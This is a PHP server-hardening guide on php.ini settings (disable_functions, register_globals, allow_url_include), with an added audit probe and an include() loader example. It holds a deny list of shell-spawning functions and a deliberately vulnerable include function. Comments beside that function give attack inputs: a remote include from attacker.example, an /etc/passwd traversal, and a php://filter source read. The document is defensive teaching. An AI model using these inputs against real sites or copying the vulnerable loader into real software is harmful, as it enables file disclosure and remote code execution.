php.ini

Disabling Functionality in PHP.ini

There are certain functions in PHP that you do not want users to call because of the damage they can do, chiefly the ones that spawn a shell or another process. Even if you know your users are not using these functions, it is wise to disable them outright so that an attacker cannot use them either. This precaution is especially effective against an attacker who has somehow managed to upload a PHP script, write one to the filesystem, or include a remote PHP file: the script still runs, but it cannot execute system commands, so the damage is limited even though the initial compromise is not prevented. disable_functions can only be set in php.ini (it is PHP_INI_SYSTEM), so a script cannot re-enable anything with ini_set(). Two cautions on the list below: disabling shell_exec also disables the backtick operator, which is what you want; but escapeshellarg and escapeshellcmd only sanitise arguments for a shell command and cannot execute anything, so disabling them breaks code that is doing the right thing without stopping an attacker. Of course there are always users who will complain; we recommend that they use a Virtual Private Server and run whatever scripts they want there.

disable_functions = exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,pcntl_exec,expect_popen
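Setting the directive is only half the job: php-fpm and mod_php often read a different php.ini than the command-line php, so the setting should be verified from the SAPI that actually serves pages. The probe below is an added example, not part of the original page; the file name and the expected list are ours (escapeshellarg and escapeshellcmd are deliberately left out of it because they are sanitisers, not executors), and it assumes PHP 5.6 or later.

```php
<?php
// audit_disable_functions.php (added example, not from the original page).
// Place it in a test vhost and request it through the web server so it runs
// under the same SAPI and php.ini as the real sites.

// Functions we expect php.ini to have disabled (our list, derived from the page).
const EXPECTED_DISABLED = [
    'exec', 'system', 'passthru', 'shell_exec', 'proc_open', 'proc_close',
    'popen', 'dl', 'show_source', 'pcntl_exec', 'expect_popen',
    'posix_kill', 'posix_mkfifo', 'posix_getpwuid', 'posix_setpgid', 'posix_setsid',
    'posix_setuid', 'posix_setgid', 'posix_seteuid', 'posix_setegid', 'posix_uname',
];

/**
 * Returns the names from $expected that are still callable in this SAPI.
 * A function listed in disable_functions is reported as non-existent by
 * function_exists(), which holds for PHP 5.x through 8.x, so the check does
 * not need to call anything dangerous.
 */
function still_enabled(array $expected): array
{
    $disabled = array_filter(array_map('trim', explode(',', (string) ini_get('disable_functions'))));
    return array_values(array_filter($expected, function ($fn) use ($disabled) {
        // A function whose extension is not loaded at all (e.g. pcntl under FPM)
        // does not exist either, which is the safe direction for this report.
        return function_exists($fn) && !in_array($fn, $disabled, true);
    }));
}

header('Content-Type: text/plain');
echo 'SAPI: ' . PHP_SAPI . "\n";
echo 'loaded php.ini: ' . (php_ini_loaded_file() ?: '(none)') . "\n";
echo 'disable_functions: ' . ini_get('disable_functions') . "\n";

$open = still_enabled(EXPECTED_DISABLED);
if ($open === []) {
    echo "OK: every expected function is disabled\n";
} else {
    echo 'STILL ENABLED: ' . implode(', ', $open) . "\n";
}

// disable_functions is PHP_INI_SYSTEM: a script cannot re-enable anything,
// so ini_set() returns false here regardless of the value passed.
var_dump(@ini_set('disable_functions', ''));
```

Remove the probe once the check passes; it prints the loaded php.ini path and the full directive, which is information an attacker would rather not have.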

Disable Globals

register_globals injected request parameters (GET, POST and cookie values) straight into the global variable namespace, so any variable a script failed to initialise could be set by the client. The feature has been DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0, so on any supported PHP the directive is simply ignored. Keeping it explicitly Off costs nothing and still protects a legacy 5.x install.

register_globals = Off

Disable Remote File Includes

Attackers will often look for file inclusion vulnerabilities in applications, typically an include or require whose path comes from a request parameter, and then use them to load malicious PHP scripts that they have written. Even if the attacker has no write access to the web application directories, with allow_url_include enabled they can host the malicious script on another server: the web application fetches it over HTTP and executes it locally!

We don't block allow_url_fopen in our hosting environment, because many sites rely on file_get_contents() or fopen() fetching URLs and turning it off breaks them. allow_url_include is the directive that matters for inclusion: it controls whether include and require may open URL wrappers at all, it has defaulted to Off since it was introduced in PHP 5.2, and it is deprecated as of PHP 7.4. Two caveats: allow_url_include = Off only stops remote inclusion, so a local file inclusion (for example ../../etc/passwd) or a php://filter read of source code still works through the same vulnerable include, and with allow_url_fopen = On any code that passes a user-supplied URL to file_get_contents() can still be abused for server-side request forgery. In both cases the application has to validate the path or URL itself.

allow_url_fopen = On
allow_url_include = Off
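The settings above limit what an inclusion bug can reach, but the bug itself has to be fixed in the application. The following added example (ours, not code from the original page; it assumes PHP 7.1 or later and a templates directory that we invent for the purpose) shows the vulnerable pattern the section describes beside an allow-listed replacement.

```php
<?php
// Added example, not from the original page: a "page loader" in two versions.

// VULNERABLE: the include path comes straight from the request.
//   allow_url_include=On : ?page=http://attacker.example/shell.txt runs remote code.
//   allow_url_include=Off: the remote fetch fails, but
//     ?page=../../../../etc/passwd                                   (local file inclusion)
//     ?page=php://filter/convert.base64-encode/resource=config.php  (source disclosure)
//   still work, because neither needs a URL wrapper.
function load_page_vulnerable(string $page): void
{
    include $page;
}

// HARDENED: request values are keys into a fixed allow-list of templates, and
// request data never reaches include(). The php.ini directives are defence in
// depth; this mapping is the actual fix. (Template names are assumed.)
const PAGE_TEMPLATES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Returns the absolute template path for an allow-listed page key, or null.
 */
function resolve_page(string $page, string $templateDir = __DIR__ . '/templates'): ?string
{
    if (!array_key_exists($page, PAGE_TEMPLATES)) {
        return null;                       // unknown key: refuse, do not guess
    }
    $base = realpath($templateDir);
    $path = realpath($templateDir . '/' . PAGE_TEMPLATES[$page]);
    // realpath() resolves symlinks and "..", so this also catches a template file
    // that was replaced by a symlink pointing outside the templates directory.
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function load_page_hardened(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    include $path;
}

load_page_hardened($_GET['page'] ?? 'home');
```

Keeping the allow-list as a constant rather than building it from a directory listing means an attacker who manages to drop a file into the templates directory still cannot get it included by name.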